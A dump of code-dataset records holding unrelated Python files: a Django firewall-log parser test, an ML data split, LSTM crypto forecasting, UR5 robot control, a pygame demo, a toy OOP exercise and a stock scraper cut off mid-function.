GUI(root)\nroot.mainloop()\n\n'''\ndef generateRandomPlayer(self):\n return Pl.Player();\n\n\ntestPlayer = Pl.Player(username=\"BOB\", summonerID=120385)\nprint(testPlayer.username)\n\ntestTeam = Te.Team()\ntestTeam.players['player1'] = testPlayer\nprint(testTeam.players['player1'])\nprint(testTeam.players['player1'].summonerID)\n\ntestMatch = Ma.Match()\nprint(testMatch.teams)\nprint(testMatch.teams['team1'])\ntestMatch = Ma.Match(testTeam, 
testTeam)\nprint(testMatch.teams['team1'])\n'''","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20106973","text":"from django.test import TestCase\nfrom Assets.models import *\nimport re\n\n# Django的单元测试基于unittest库\nclass AssetsTestCase(TestCase):\n\n # 测试函数执行前执行\n def setUp(self):\n print(\"======in setUp\")\n\n # 需要测试的内容\n def test_add(self):\n filepath = 'static/upload/pf.log'\n f = open(filepath, 'r')\n fileContent = f.readlines()\n for line in fileContent:\n\n line = line.strip()\n # print(line)\n if line.startswith(\"rule add\"):\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ruleId = ''\n for id in re.findall('id (.*?) name', line):\n ruleId = ruleId + \" \" + id\n\n ruleName = \"\"\n for name in re.findall('name \"(.*?)\" sa', line):\n ruleName = ruleName + \" \" + name\n\n ruleSa = \"\"\n for sa in re.findall('sa (.*?) da', line):\n ruleSa = ruleSa + \" \" + sa\n\n ruleDa = \"\"\n for da in re.findall('da \"(.*?)\" izone', line):\n ruleDa = ruleDa + \" \" + da\n\n ruleIzone = \"\"\n for izone in re.findall('izone (.*?) ozone', line):\n ruleIzone = ruleIzone + \" \" + izone\n\n ruleOzone = \"\"\n for ozone in re.findall('ozone (.*?) service', line):\n ruleOzone = ruleOzone + \" \" + ozone\n\n ruleService = \"\"\n for service in re.findall('service (.*?) time', line):\n ruleService = ruleService + \" \" + service\n\n ruleOpentime = \"\"\n for opentime in re.findall('time any log', line):\n ruleOpentime = ruleOpentime + \" \" + opentime\n\n ruleStatus = \"\"\n for service in re.findall('service (.*?) time', line):\n ruleStatus = ruleStatus + \" \" + service\n\n ruleActive = \"\"\n for active in re.findall('type (.*?) id', line):\n ruleActive = ruleActive + \" \" + active\n\n\n comment = line.split(\" \")[-1].replace('\"', \"\")\n\n # ruleAccount = \"\"\n # for service in re.findall('service (.*?) 
time', line):\n # ruleAccount = ruleAccount + \" \" + service\n\n\n\n\n\n\n\n\n print(ruleId, \"-\", ruleName, \"-\", ruleSa, \"-\", ruleDa, \"-\", ruleIzone, \"-\", ruleOzone, \"-\", ruleService, \"-\", ruleOpentime, \"-\", ruleStatus, \"-\", ruleActive, \"-\", comment)\n\n\n policy = PolicyManage()\n policy.ruleId = ruleId.encode('utf8')\n policy.ruleName = ruleName.encode('utf8')\n policy.ruleSa = ruleSa.encode('utf8')\n policy.ruleDa = ruleDa.encode('utf8')\n policy.ruleIzone = ruleIzone.encode('utf8')\n policy.ruleOzone = ruleOzone.encode('utf8')\n policy.ruleService = ruleService.encode('utf8')\n policy.ruleOpentime = ruleOpentime.encode('utf8')\n policy.ruleStatus = ruleStatus.encode('utf8')\n policy.ruleActive = ruleActive.encode('utf8')\n policy.ruleComment = comment.encode('utf8')\n policy.save()\n\n\n\n # self.assertEqual(student.name, 'aaa')\n\n # 需要测试的内容\n def test_check_exit(self):\n # self.assertEqual(0, FireWallFile.objects.count())\n print(\"======in test_check_exit\")\n\n\n# 测试函数执行后执行\n def tearDown(self):\n # pass\n print(\"======in tearDown\")\n # address = AddressName.objects.all()\n #\n # for line in address:\n # print(line.addressName)\n # print(line.addressIP)\n # print(line.aaddressComment)\n","sub_path":"FireWall/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"358417840","text":"import pandas as pd\nimport numpy as np\ndf = pd.read_csv(\"gossip_time_combied.csv\", index_col=None)\n\ncontents = list(df[\"content\"].values)\nprint(len(contents))\nlabels = list(df[\"label\"].values)\nprint(len(labels))\n\nnum_total = len(labels)\nnum_train = int(0.9 * num_total)\nnum_test = num_total-num_train\nprint(num_train, num_test)\n\nshuffled_arg = np.arange(num_total)\nnp.random.shuffle(shuffled_arg)\n\ncontents = np.asarray(contents)\nlabels = np.asarray(labels)\n\ncontents = contents[shuffled_arg]\nlabels = labels[shuffled_arg]\n\ndata = zip(contents, labels)\n\nl = open(\"gossip_labels.txt\", \"w\")\nc = open(\"gossip_corpus.txt\", \"w\")\nfor i, (content, label) in enumerate(data):\n if i<=num_train:\n dataset = \"train\"\n if i>num_train:\n dataset = \"test\"\n string = \"{}\\t{}\\t{}\".format(str(i), dataset, str(label))\n content = content.replace(\"\\n\", \"\").strip()\n l.write(string+\"\\n\")\n c.write(content+\"\\n\")\nl.close()\nc.close()\n","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"282676989","text":"'''\nCopyright 2017 Recruit Institute of Technology\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\n\n\nimport sys\nimport logging\nfrom optparse import OptionParser\n\n# Parse commandline arguments\nop = OptionParser()\nop.add_option(\"--query_file\",\n action=\"store\", type=\"string\", dest=\"query_file\",\n help=\"Query file name.\")\nop.add_option(\"--doc_parser\",\n action=\"store\", 
type=\"string\", dest=\"doc_parser\",\n default=\"koko\",\n help=\"Text parser: koko or spacy.\")\nop.add_option(\"--output_format\",\n action=\"store\", type=\"string\", dest=\"output_format\",\n default=\"text\",\n help=\"Output format: text or json.\")\nop.add_option(\"--log_level\",\n action=\"store\", type=\"string\", dest=\"log_level\",\n default=\"error\",\n help=\"Logging level: info, warning, error.\")\n\n(opts, args) = op.parse_args()\nif len(args) > 0:\n logger.error(\"this script takes no arguments.\")\n\n# Set up logging\nlogging_level_dict = { 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR }\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging_level_dict[opts.log_level])\nformatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nwith open(opts.query_file, 'r') as qfile:\n query = qfile.read()\n\n# Process the KOKO query\n\nfrom koko.query_processor import QueryProcessor\nprocessor = QueryProcessor(opts.doc_parser)\nresponse = processor.ProcessQuery(query)\n\n# Print the results\nif opts.output_format == 'text':\n print(\"\\nResults:\\n\")\n print(\"%s %s\" % (\"{:<50}\".format(\"Entity name\"), \"Entity score\"))\n print(\"================================================================\")\n for entity in response.entities:\n print(\"%s %f\" % (\"{:<50}\".format(entity.name), entity.score))\nelse:\n import json\n import jsonpickle\n pickled = jsonpickle.encode(response, unpicklable=False)\n json_result = json.loads(pickled)\n print(json.dumps(json_result, sort_keys=False, indent=2))\n \n","sub_path":"examples/run_koko.py","file_name":"run_koko.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"178878093","text":"\nimport pygame\nimport sys\n\nclass Game:\n \n def __init__(self):\n pygame.init()\n pygame.display.set_caption('buttonmoon')\n self.setup()\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n self.render()\n\n def setup(self):\n self.window = pygame.display.set_mode((1280, 720), 0, 32)\n self.font = pygame.font.SysFont('Arial', 24)\n\n def render(self):\n self.window.fill((0, 0, 0))\n message = self.font.render('hello, world!', True, (255, 30, 230), (0, 0, 0))\n self.window.blit(message, (0, 0))\n pygame.display.update()\n\nif __name__ == '__main__':\n Game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"292377208","text":"import os\nimport unicodedata, re\nimport pandas as pd\n\nLIB_PATH = os.path.dirname(os.path.realpath(__file__))\nPOTCAR_PATH = \"/home/xzhang1/src/VASP_PSP/potpaw_PBE.54/\"\n\ndef periodic_table_lookup(symbol, column, periodic_table = pd.read_excel(LIB_PATH + '/data/periodic_table.xlsx')):\n \"\"\"\n Args:\n symbol (str): 'Pb'\n column (str): 'pot_encut'\n \"\"\"\n return periodic_table.loc[periodic_table.symbol == symbol, column].values[0]\n\ndef template(i, o, d):\n \"\"\"i.format(d)\n\n Args:\n i (str): input file path\n o (str): output file path\n d (dict):\n \"\"\"\n with open(i, \"r\") as i:\n with open(o, \"w\") as o:\n o.write(\n i.read().format(**d)\n )\n\ndef slugify(value):\n \"\"\"Make a string URL- and filename-friendly.\n\n Args:\n value (unicode): string to be 
converted\n\n Returns:\n unicode: filename-friendly string\n\n Raises:\n TypeError: if value is not unicode string\n \"\"\"\n value = unicodedata.normalize('NFKD', value)\n value = re.sub(r'[^\\w\\s-]', '', value).strip().lower()\n value = re.sub(r'[-\\s]+', '-', value)\n return value","sub_path":"codebase/toolkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"226027292","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom tensorflow.keras.layers import LSTM,Dropout,Dense,Activation,Input\nfrom tensorflow.keras.models import Model\nfrom utility.dataset_utils import cut_dataset_by_range\n\ndef prepare_input_forecasting(DATA_PATH,crypto,features_to_use):\n df=pd.read_csv(os.path.join(DATA_PATH,crypto),usecols=features_to_use)\n #features_without_symbols = [feature for feature in df.columns if not feature.startswith(\"symbol\")]\n features_without_date_and_symbols = [feature for feature in df.columns if feature != \"Date\" and not feature.startswith(\"symbol\")]\n return df,features_without_date_and_symbols\n\ndef fromtemporal_totensor(dataset, window_considered, output_path, output_name):\n try:\n # pickling is also known as Serialization\n # The pickle module is not secure. Only unpickle data you trust.\n # load is for de-serialize\n # allow_pickle=True else: Object arrays cannot be loaded when allow_pickle=False\n file_path = output_path + \"/crypto_TensorFormat_\" + output_name + \"_\" + str(window_considered) + '.npy'\n lstm_tensor = np.load(file_path, allow_pickle=True)\n print('(LSTM Version found!)')\n return lstm_tensor\n except FileNotFoundError as e:\n print('Creating LSTM version..')\n # an array in this format: [ [[items],[items]], [[items],[items]],.....]\n # -num of rows: window_considered\n # -num of columns: \"dataset.shape[1]\"\n # 1 is the number of elements in\n lstm_tensor = np.zeros((1, window_considered, dataset.shape[1]))\n # for i between 0 to (num of elements in original array - window + 1)\n \"\"\"easy explanation through example:\n i:0-701 (730-30+1)\n i=0; => from day 0 + 30 days \n i=1 => from day 1 + 30 days \n \"\"\"\n for i in range(dataset.shape[0] - window_considered + 1):\n #note (i:i + window_considered) is the rows selection.\n element=dataset[i:i + window_considered, :].reshape(1, window_considered, dataset.shape[1])\n lstm_tensor = np.append(lstm_tensor, element,axis=0)#axis 0 in order to appen on rows\n\n #serialization\n output_path += \"/crypto_\"\n name_tensor = 'TensorFormat_' + output_name + '_' + str(window_considered)\n #since the first element is zero I'll skip it:\n lstm_tensor=lstm_tensor[1:,:]\n np.save(str(output_path + name_tensor),lstm_tensor)\n print('LSTM version created!')\n return lstm_tensor\n\ndef get_training_validation_testing_set(dataset_tensor_format, date_to_predict):\n train = []\n test = []\n index_feature_date = 0\n for sample in dataset_tensor_format:\n # Candidate is a date: 2018-01-30, for example.\n # -1 is used in order to reverse the list.\n #takes the last date in the sample: 2017-01-09, 2017-01..., ... 
, 2017-02-2019\n #since the last date is 2017-02-2019, then it is before the date to predict for example 2019-03-05, so this sample\n #will belong to the training set.\n candidate = sample[-1,index_feature_date]\n candidate = pd.to_datetime(candidate)\n\n #if the candidate date is equal to the date to predict then it will be in test set.\n #it happens just one time for each date to predict.\n #Test will be: [[items]] in which the items goes N(30,100,200) days before the date to predict.\n #d_validation = pd.to_datetime(date_to_predict) - timedelta(days=3)\n \"\"\"days=[]\n i=number_of_days_to_predict-1\n while i>0:\n d = pd.to_datetime(date_to_predict) - timedelta(days=i)\n days.append(d)\n i-=1\n days.append(pd.to_datetime(date_to_predict))\"\"\"\n if candidate == pd.to_datetime(date_to_predict):\n #remove the \"Data\" information\n sample = sample[:, 1:].astype('float')\n test.append(sample)\n elif candidate < pd.to_datetime(date_to_predict):\n # remove the \"Data\" information\n sample=sample[:,1:].astype('float')\n train.append(sample)\n #return np.array(train), np.array(validation),np.array(test)\n return np.array(train),np.array(test)\n\ndef train_single_target_model(x_train, y_train, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n #note: it's an incremental way to get a final model.\n #\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=patience,mode='min'),\n ModelCheckpoint(\n monitor='val_loss', save_best_only=True, mode='min',\n filepath=model_path+'lstm_neur{}-do{}-ep{}-bs{}-target{}.h5'.format(\n num_neurons, dropout, epochs, batch_size,date_to_predict))\n ]\n if model is None:\n model = Sequential()\n # Add a LSTM layer with 128/256 internal units.\n #model.add(LSTM(units=num_neurons,return_sequences=True,input_shape=(x_train.shape[1], x_train.shape[2])))\n model.add(LSTM(units=num_neurons,input_shape=(x_train.shape[1], x_train.shape[2])))\n #reduce the overfitting\n model.add(Dropout(dropout))\n model.add(Dense(units=num_neurons, activation='relu',name='ReLu'))\n model.add(Dense(units=num_categories, activation='softmax',name='softmax'))\n # optimizer\n adam = Adam(learning_rate=learning_rate)\n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n\n history=model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size, validation_split = 0.001,\n verbose=0, shuffle=False,callbacks=callbacks)\n\n return model, history\n\ndef train_multi_target_model(x_train, y_trains_encoded, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=patience, mode='min'),\n ModelCheckpoint(\n monitor='val_loss', save_best_only=True, mode='min',\n filepath=model_path + 'lstm_neur{}-do{}-ep{}-bs{}-target{}.h5'.format(\n num_neurons, dropout, epochs, batch_size, date_to_predict))\n ]\n #note: it's an incremental way to get a final model.\n #\n inputs_stm = Input(shape=(x_train.shape[1], x_train.shape[2]))\n lstm= LSTM(units=num_neurons)(inputs_stm)\n # reduce the overfitting\n \"\"\"lstm=Dropout(dropout)(lstm)\n lstm = Dense(units=num_neurons, activation='relu')(lstm)\"\"\"\n\n cryptocurrencies=[]\n losses = {}\n losses_weights = {}\n y_train_dict = {}\n loss = \"categorical_crossentropy\"\n loss_weight = 1.0\n i = 0\n while i < len(y_trains_encoded):\n losses['trend_' + str(i)] = loss\n losses_weights['trend_' + str(i)] = loss_weight\n 
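# Keras matches these dict keys to the output-layer names ('trend_0', 'trend_1', ...), pairing each prediction head with its loss, loss weight and one-hot labels\n 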
y_train_dict['trend_' + str(i)] = y_trains_encoded[i]\n\n crypto_model = LSTM(units=num_neurons)(inputs_stm)\n # reduce the overfitting\n crypto_model= Dropout(dropout)(crypto_model)\n crypto_model= Dense(units=num_neurons, activation='relu',name=\"ReLu_\"+ str(i))(crypto_model)\n crypto_model=Dense(units=num_categories, activation='softmax', name='trend_' + str(i))(crypto_model)\n cryptocurrencies.append(crypto_model)\n\n \"\"\"crypto_model = Dropout(dropout)(lstm)\n crypto_model = Dense(units=num_neurons, activation='relu', name=\"ReLu_\" + str(i))(crypto_model)\n crypto_model = Dense(units=num_categories, activation='softmax', name='trend_' + str(i))(crypto_model)\n cryptocurrencies.append(crypto_model)\"\"\"\n i += 1\n\n model = Model(\n inputs=inputs_stm,\n outputs=cryptocurrencies,\n name=\"multitarget\")\n\n # initialize the optimizer and compile the model\n adam = Adam(learning_rate=learning_rate)\n model.compile(optimizer=adam, loss=losses, loss_weights=losses_weights,\n metrics=[\"accuracy\"])\n\n\n history = model.fit(x_train, y_train_dict,\n epochs=epochs, validation_split=0.02, batch_size=batch_size,\n verbose=0, shuffle=False, callbacks=callbacks)\n return model, history\n\n\"\"\"def train_model_new(x_train, y_trains_encoded, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n #note: it's an incremental way to get a final model.\n #\n print(x_train.shape)\n inputs = Input(shape=(x_train.shape[1], x_train.shape[2]),batch_size=x_train.shape[0])\n #trend_btc= Sequential()\n trend_btc= LSTM(units=num_neurons)(inputs)\n print(LSTM)\n # reduce the overfitting\n trend_btc= Dropout(dropout)(trend_btc)\n trend_btc= Dense(units=num_neurons, activation='relu')(trend_btc)\n trend_btc=Dense(units=num_categories)(trend_btc)\n trend_btc= Activation('softmax',name=\"trend_btc\")(trend_btc)\n\n\n # trend_btc= Sequential()\n trend_eth = LSTM(units=num_neurons)(inputs)\n # reduce the overfitting\n trend_eth = Dropout(dropout)(trend_eth)\n trend_eth = Dense(units=num_neurons, activation='relu')(trend_eth)\n trend_eth= Dense(units=num_categories)(trend_eth)\n trend_eth = Activation('softmax', name=\"trend_eth\")(trend_eth)\n\n model = Model(\n inputs=inputs,\n outputs=[trend_btc,trend_eth],\n name=\"multitarget\")\n\n losses = {\n \"trend_btc\": \"categorical_crossentropy\",\n \"trend_eth\": \"categorical_crossentropy\",\n }\n loss_weights = {\"trend_btc\": 1.0, \"trend_eth\": 1.0}\n # initialize the optimizer and compile the model\n adam = Adam(learning_rate=learning_rate)\n model.compile(optimizer=adam, loss=losses, loss_weights=loss_weights,\n metrics=[\"accuracy\"])\n plot_model(model, to_file=\"neural_network.png\", show_shapes=True,\n show_layer_names=True, expand_nested=True, dpi=150)\n\n history=model.fit(x_train, {\"trend_btc\": y_trains_encoded[0], \"trend_eth\": y_trains_encoded[1]},\n epochs=epochs, validation_split = 0.02,\n verbose=0, shuffle=False)\n\n return model, history\"\"\"","sub_path":"modelling/techniques/forecasting/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":10297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"589386717","text":"VAR = {\n\"NAME\": \"test\", #Name of the project\n\"LIG1_FILE\" : \"LF1.mol2\", #Name of the mol2 of ligand1 (must be in the working directory)\n\"CAP1\" : \"N\",\t\t #Atom numbers (as in the mol2, likely to start in 1) to remove. 
Numbers separated by commas\n\n"LIG2_FILE" : "LF2.mol2", #Name of the mol2 of ligand2 (must be in the working directory)\n"CAP2" : "N", #Atom numbers (as in the mol2, likely to start in 1) to remove. Numbers separated by commas\n"MORPHOLOGY" : "random", #Morphology to distribute ligands1 and 2. random, janus, and stripe are allowed\n"LIG1_FRAC" : "1.0", #Fraction of ligand1 to place (0-1.0)\n"RSEED" : "666", #Random seed for random morphology\n"STRIPES" : "1", #Number of stripes for stripe morphology. It will start (bottom up with ligand 1)\n\n"CORE" : "au144SR60_NM.pdb", #Name of the core to coat. Found in COREDIR/CORE\n\n"COREDIR" : "/DATA/SoftwareSFU/IN-HOUSE/NanoModeler/CORES", #Path to folder containing all the available cores\n"DEPENDS" : "/DATA/SoftwareSFU/IN-HOUSE/NanoModeler/DEPENDENCIES" #Path to the folder containing all the dependencies that come with NanoModeler\n}\n\nimport numpy as np\ndef read_resname(lig_fname):\n mol2 = np.genfromtxt(lig_fname, delimiter="\n", dtype='str')\n for i in range(len(mol2)):\n if "@<TRIPOS>ATOM" in mol2[i]:\n resname = mol2[i+1].split()[7]\n return resname\n\ndef write_leap(fname, two_lig_func):\n msj = "source leaprc.gaff \n\n"\n msj += "loadamberparams " + "TMP/"+VAR["LIG1_FILE"][:-5]+".frcmod\n"\n\n msj += read_resname(VAR["LIG1_FILE"]) + " = loadmol3 " + "TMP/"+VAR["LIG1_FILE"]+"\n"\n msj += "check " + read_resname(VAR["LIG1_FILE"]) + "\n"\n msj += "saveoff " + read_resname(VAR["LIG1_FILE"]) + " " + "TMP/"+VAR["LIG1_FILE"][:-5]+".lib\n\n"\n if two_lig_func:\n msj += "loadamberparams " + "TMP/"+VAR["LIG2_FILE"][:-5]+".frcmod\n"\n msj += read_resname(VAR["LIG2_FILE"]) + " = loadmol3 " + "TMP/"+VAR["LIG2_FILE"]+"\n"\n msj += "check " + read_resname(VAR["LIG2_FILE"]) + "\n"\n msj += "saveoff " + read_resname(VAR["LIG2_FILE"]) + " " + "TMP/"+VAR["LIG2_FILE"][:-5]+".lib\n\n"\n\n msj += "loadamberparams " + VAR["DEPENDS"]+"/AU.frcmod\n"\n msj += "loadamberparams " + VAR["DEPENDS"]+"/ST.frcmod\n"\n msj += "AU = loadmol3 " + VAR["DEPENDS"]+"/AU.mol2\n"\n msj += "ST = loadmol3 " + VAR["DEPENDS"]+"/ST.mol2\n\n"\n\n msj += "loadoff " + "TMP/"+VAR["LIG1_FILE"][:-5]+".lib\n"\n if two_lig_func:\n msj += "loadoff " + "TMP/"+VAR["LIG2_FILE"][:-5]+".lib\n"\n\n msj += VAR["NAME"] + " = loadpdb " + "TMP/"+VAR["NAME"]+".pdb \n"\n msj += "saveamberparm " + VAR["NAME"] + " " + "TMP/"+VAR["NAME"]+".prmtop" + " " + "TMP/"+VAR["NAME"]+".inpcrd \n"\n msj += "quit"\n out = open(fname, "w")\n out.write(msj)\n out.close()\n","sub_path":"defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"400767317","text":"\"\"\"\nDefine a Tianshan Tonglao class named TongLao, whose attributes are hp (health) and power (combat strength), obtained from the passed-in arguments. The TongLao class has 2 methods:\nsee_people, which takes a name parameter:\nif "WYZ" (无崖子, Wuyazi) is passed in, print "Junior brother!!!!"; if "李秋水" (Li Qiushui) is passed in, print "Bah, you wretch"; if "丁春秋" (Ding Chunqiu) is passed in, print "Traitor! I'll kill you"\nfight_zms (Tianshan Zhemei Shou): calling it multiplies her own power by 10 and halves her hp.\nIt takes the enemy's hp and power and plays one round of combat; afterwards both sides' hp are compared, and whoever has more hp wins.\nDefine a XuZhu class that inherits from TongLao. Xuzhu is kind-hearted and does not want to fight, so he only has a read (chant sutras) method, which prints "Sin, sin" on every call.\nAdd modular refactoring\n"""\n\n\n# Define a Tianshan Tonglao class named TongLao\nclass TongLao:\n # Constructor: define Tonglao's attributes, hp and power (from the passed-in arguments)\n def __init__(self, hp, power):\n self.hp = hp\n self.power = power\n\n # Define the see_people method, which takes a name parameter\n def see_people(self, name):\n # If "无崖子" (Wuyazi) is passed in, print "Junior brother!!!!"\n if name == "无崖子":\n print("Junior brother!!!!")\n # If "李秋水" (Li Qiushui) is passed in, print "Bah, you wretch!"\n elif name == "李秋水":\n print("Bah, you wretch!")\n # If "丁春秋" (Ding Chunqiu) is passed in, print "Traitor! I'll kill you!"\n elif name == "丁春秋":\n print("Traitor! I'll kill you!")\n\n # Define the fight_zms method (Tianshan Zhemei Shou); calling it multiplies her own power by 10 and halves her hp.\n # Takes the enemy's health en_hp and combat strength en_power\n def fight_zms(self, en_hp, en_power):\n hp = self.hp / 2 - en_power\n en_hp = en_hp - self.power * 10\n # Fight one round, then compare the outcome\n if hp < en_hp:\n print("Just you wait! One day you will fall at my feet!")\n elif hp > en_hp:\n print("That day has finally come, hahahaha! Hahahaha!")\n else:\n raise Exception("Hmph! Not bad, kid! Keep going, and watch me thrash you until you beg for mercy!")\n\n\n# Instantiate\ntl = TongLao(2000, 1000)\ntl.see_people("丁春秋")\ntl.fight_zms(1000, 2000)\n","sub_path":"practice/python_oo/tonglao.py","file_name":"tonglao.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"280658647","text":"\"\"\"\n Called from Matlab: 12 arguments are xamp, xfreq, xphase, yamp, yfreq, \n yphase, zamp, zfreq, depth, anglex, \n angley, duration\n \n Motions for optimization tasks: 11D parameterised space\n"""\n\nimport time\nimport serial\nimport math\nfrom math import pi\nimport numpy\nimport socket\nimport sys\nimport sched\n\nsys.path.append("C:/Users/David/Documents/PhD/ur5control")\nimport waypoints as wp\nimport kg_robot as kgr\n\ntstart = time.time()\n\nurnie = kgr.kg_robot(port=30010,db_host="169.254.161.50")\nurnie.set_tcp(wp.plunger_tcp)\n\n#scheduler used to regularly pass desired positions to servoj \nscheduler = sched.scheduler(time.time, time.sleep)\ndef schedule_it(dt, duration, callable, *args):\n for i in range(int(duration/dt)):\n scheduler.enter(i*dt, 1, callable, args)\n\n#calculate starting position of motion\ndef starting_pos(centrepose, xamp, xphase, yamp, yphase, depth, anglex, angley):\n npose = numpy.add(centrepose, [0, 0, 0.001*(30-depth), 0, 0, 0])\n npose = numpy.add(npose, [0, 0, 0, anglex, angley, 0])\n npose = numpy.add(npose, [xamp*math.sin(xphase), 0, 0, 0, 0, 0])\n npose = numpy.add(npose, [0, yamp*math.sin(yphase), 0, 0, 0, 0])\n urnie.movel(npose)\n \n# main function: moves to desired position at any moment in time\ndef parameter_move(t0, centrepose, xamp, xfreq, xphase, yamp, yfreq, yphase, zamp, zfreq, depth, anglex, angley):\n #start with z height\n npose = numpy.add(centrepose, [0, 0, 0.001*(30-depth), 0, 0, 0])\n #add angles\n npose = numpy.add(npose, [0, 0, 0, anglex, angley, 0])\n t = time.time() - t0\n #x vibrations\n npose = numpy.add(npose, [xamp*math.sin(xfreq*t+xphase), 0, 0, 0, 0, 0])\n #y vibrations\n npose = numpy.add(npose, [0, yamp*math.sin(yfreq*t+yphase), 0, 0, 0, 0])\n #zvibrations\n npose = numpy.add(npose, [0, 0, zamp*math.sin(zfreq*t), 0, 0, 0])\n #pass to UR5\n urnie.servoj(npose, vel=50, control_time=0.05)\n\nurnie.movel(wp.above_tubl, 0.5, 0.02) #move above tub\ncentrepose=numpy.add(wp.above_tubl, [0, 0, -0.03, 0, 0, 0])\n\n#move to starting position\nstarting_pos(centrepose, 0.001*float(sys.argv[1]), (pi/180)*float(sys.argv[3]),\n 0.001*float(sys.argv[4]), (pi/180)*float(sys.argv[6]),\n float(sys.argv[9]), 
(pi/180)*float(sys.argv[10]), (pi/180)*float(sys.argv[11]))\n\n#run scheduler calling servoj\nscheduler.run()\n\nurnie.close()\n\n","sub_path":"Call11D.py","file_name":"Call11D.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"603254321","text":"import requests\nimport json\nimport requests_cache\nimport time\nimport logging\nimport pandas as pd\nimport urllib.request\nfrom datetime import date, timedelta, datetime\nfrom pyquery import PyQuery\nfrom pandas_datareader.nasdaq_trader import get_nasdaq_symbols\nfrom .holding import Holding\nfrom financescraper import scraper, conversions\n\nsymbols = get_nasdaq_symbols()\nexpire_after = timedelta(days=5)\nrequests_cache.install_cache('cache_data', expire_after=expire_after)\n\nyahoo_scraper = scraper.YahooScraper()\nusd_converter = conversions.CurrencyConverter('USD')\n\n\n# Scrape name and holdings if any for a given ticker\ndef scrape_ticker(ticker, use_yahoo):\n holdings = []\n data = get_data(ticker, use_yahoo)\n\n # invalid ticker\n if data is None:\n return holdings\n\n if _is_etf(data):\n _get_etf_data(ticker, data, holdings)\n else:\n _get_stock_data(ticker, data, holdings)\n return holdings\n\n\n# Get the nasdaq data for a given ticker\ndef get_data(ticker, useYahoo):\n data = None\n tmp = {'Yahoo': False}\n try:\n data = pd.Series(tmp)\n data = data.append(symbols.loc[ticker])\n except KeyError:\n data = None\n if useYahoo:\n # logging uses %-style formatting; passing extra args print-style breaks the log call\n logging.info('Failed to retrieve data for ticker %s. Attempting to get it from finance.yahoo.com', ticker)\n data = _get_data_from_yahoo(ticker)\n else:\n logging.info('Failed to retrieve data for ticker %s', ticker)\n return data\n\n\n# Get latest price for a given ticker\ndef get_price(ticker):\n with requests_cache.disabled():\n quote = _get_iex_data([ticker], ['price'])\n return _round_price(quote[ticker]['price'])\n\n\ndef get_company_data(tickers):\n company_data = {}\n data = _get_iex_data(tickers, ['company'])\n for ticker in tickers:\n if (ticker not in data) and (ticker != ''):\n company = _get_company_from_yahoo(ticker)\n if company is not None:\n data[ticker] = company\n for ticker, stock in data.items():\n quote = stock['company']\n if quote is None:\n continue\n company_data[ticker] = {'name': quote['companyName'], 'sector': quote['sector'], 'link': quote['website']}\n return company_data\n\n\ndef get_stock_news(tickers):\n stock_news = {}\n with requests_cache.disabled():\n data = _get_iex_data(tickers, ['news'], ['last=5'])\n for ticker, stock in data.items():\n news = stock['news']\n if news is None:\n continue\n news_items = []\n for news_item in news:\n news_items.append({'title' : news_item['headline'], 'description' : news_item['summary'], \n 'image_url' : _get_ticker_image(ticker), 'datetime' : _convert_time(news_item['datetime']),\n 'url' : news_item['url'], 'source' : news_item['source']})\n stock_news[ticker] = news_items\n return stock_news\n\n\ndef get_holding_data(ticker):\n holding_data = {}\n with requests_cache.disabled():\n data = _get_iex_data([ticker], ['quote', 'chart'], ['displayPercent=true', 'range=1y'])\n return data\n\n\ndef _round_price(price):\n return format(price, '.2f')\n\n\ndef 